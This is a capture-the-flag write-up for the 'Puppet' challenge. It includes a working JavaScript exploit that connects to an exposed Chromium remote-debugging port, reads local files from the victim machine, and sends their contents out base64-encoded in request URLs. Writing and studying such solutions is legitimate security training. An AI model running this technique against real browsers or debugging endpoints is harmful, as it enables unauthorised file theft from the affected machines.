# Puppet
## Challenge files
The main important thing we're given is the Puppeteer Chromium launch flags:
```js
const browser = await puppeteer.launch({
  dumpio: true,
  args: [
    '--disable-web-security',
    '--user-data-dir=/tmp/chrome',
    '--remote-debugging-port=5000',
    '--disable-dev-shm-usage', // Docker stuff
    '--js-flags=--jitless' // No Chrome n-days please
  ]
})
```

## Analysis
The challenge website allows us to submit a URL for the browser to navigate to.

The browser is launched with `--disable-web-security`. This means it has something to do with CORS / local file inclusion. The fact that the debugging port is open is probably also important.

I started by launching my own chromium with those flags and messing around. I found that you could debug the browser by navigating to `localhost:5000`, so maybe you can do that from javascript on the page that I send?

After a _lot_ of DuckDuckGo'ing, I found out that you can connect to a running chromium instance from puppeteer using the [connect](https://pptr.dev/#?product=Puppeteer&version=v10.0.0&show=api-puppeteerconnectoptions) function.

It also took me a while to find [a version of puppeteer](https://github.com/entrptaher/puppeteer-web) that would work _in_ the browser, because the normal one depends on some nodejs filesystem stuff.

## Solution
After a bit more trial and error due to the fact that I basically don't even know what puppeteer is, I was able to get the flag with this script. Yes, the part that gets the name of the file is parsing HTML with regex.

It exfiltrates data by base64-encoding it and then causing a 404, because I'm lazy and don't want to implement something that will accept a post.

```js
fetch('http://localhost:5000/json/version')
	.then(response => response.json())
	.then(enablePuppeteer);

let scriptRe = /<script>addRow\("([^"]+)"/

async function enablePuppeteer(data) {
	try {
		let debugUri = data["webSocketDebuggerUrl"];
		const browser = await puppeteer.connect({"browserWSEndpoint": debugUri});
		const page = await browser.newPage();
		await page.goto('file:///home/inmate/Documents');
		content = await page.mainFrame().content();
		filename = scriptRe.exec(content)[1];
		await page.goto("file:///home/inmate/Documents/" + filename);
		content = await page.mainFrame().content();
		fetch("/" + btoa(content + "\n"));
	} catch (e) {
		fetch("/" + btoa(e.stack + "\n"));
	}
}
```
